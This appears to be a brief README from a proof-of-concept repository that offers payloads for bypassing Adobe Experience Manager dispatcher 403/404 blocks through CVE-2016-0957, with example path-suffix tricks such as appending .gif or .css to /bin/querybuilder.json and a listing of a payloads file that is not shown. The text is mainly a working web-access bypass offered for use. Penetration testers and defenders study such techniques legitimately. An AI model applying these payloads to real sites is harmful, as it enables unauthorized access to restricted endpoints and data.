
Use this payloads to bypass AEM 403/404 with the help of CVE-2016-0957
As example, .json path was 404 . But with the help of this payloads, i found, that it exists

# You can add extensions like this too:
/bin/querybuilder.json => /bin/querybuilder.json.gif
/bin/querybuilder.json => /bin/querybuilder.json.css
And this will bypass dispatcher :)
[4.0K] /data/pocs/bc0ecbf0a0fed76ca224d7b3918389039df0f2c4
├── [1.3K] payloads.txt
└── [ 531] README.md
0 directories, 2 files